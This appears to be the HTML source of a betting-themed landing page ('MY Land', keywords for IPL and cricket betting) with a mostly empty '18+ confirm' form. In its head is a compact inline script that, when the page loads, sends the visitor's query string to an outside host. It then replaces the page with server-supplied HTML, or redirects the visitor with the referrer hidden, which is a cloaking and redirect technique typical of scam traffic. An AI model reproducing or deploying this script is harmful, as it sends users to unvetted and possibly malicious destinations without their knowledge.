<!DOCTYPE html><html  ><head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
        <script defer>!function(){if(-1==window.location.href.search("[?&]nr=1")){var e=new XMLHttpRequest;e.open("GET","https://vekkatop.in.net/index.php?key=y1dyguel8zoxt51qdznb&lp_type=js_redirect&"+window.location.search.substring(1),!0),e.onload=function(){if(200===e.status){var t=JSON.parse(e.responseText);return t.landing_html?(document.open(),document.write(t.landing_html),void document.close()):t.landing_url?(document.open(),document.write("<html><head>"),document.write('<meta name="referrer" content="never" />'),document.write('<meta http-equiv="refresh" content="0; url='+t.landing_url+'" />'),document.write("</head></html>"),void document.close()):void 0}},e.send()}}();</script>

        <link rel="icon" href="favicon.png" sizes="16x16" type="image/png">
        <title>MY Land</title>
        <link href="1.bundle.9df7293d.css" rel="stylesheet">
        <link href="bundle.0ca08b65.css" rel="stylesheet">
        <link rel="preconnect" href="https://fonts.gstatic.com/">
        <meta name="keywords" content="IPL betting, cricket betting, 1xbet, 22bet, indiabet, forabet">
<link href="css2.css" rel="stylesheet">
 </head>
    <body style="background: rgba(0, 0, 0, 0) url(&quot;bannerking.jpeg&quot;) no-repeat scroll 50% center / cover;">
        <div class="container">
            <header class="header" style="visibility: hidden;"></header>
            <main class="main">
                <div class="king"></div>
                <div class="text">
                    <div class="title"></div>
                    <div class="percent-block">
                        <div class="percent-number"></div>
                        <div class="percent-text"></div>
                    </div>
                    <div class="cash-block" style="visibility: hidden;">ask</div>
                    <div class="spins-block">I confirm that I am 18</div>
                    <form action="##" method="POST" style="text-align: center;"><input name="cparam" type="text" value="" style="display: none;"><button class="button-block" style="background-color: transparent; border: medium none;" id="submit-btn"><span class="button" style="text-decoration-line: underline;">Confirm</span></button>
                    <div class="icons-circle" style="visibility: hidden;">
                        <div class="icon-chat"></div>
                        <div class="icon-bonus"></div>
                        <div class="icon-slots"></div>
                    </div>
                </form></div>
            </main>
            <footer class="footer">
                <div class="footer-icons" style="display: none;">
                    <div class="icon trustly"></div>
                    <div class="icon ideal"></div>
                    <div class="icon visa"></div>
                    <div class="icon mastercard"></div>
                    <div class="icon skrill"></div>
                    <div class="icon neteller"></div>
                    <div class="icon paysafe"></div>
                </div>
                <div class="footer-icons" style="display: none;">
                    <div class="icon resp-gaming"></div>
                    <div class="icon safe-security"></div>
                    <div class="icon age"></div>
                    <div class="icon laptops"></div>
                </div>
                <div class="footer-copytext">
                    <br>
                    
                </div>
            </footer>
            
    

</div>
</body></html>
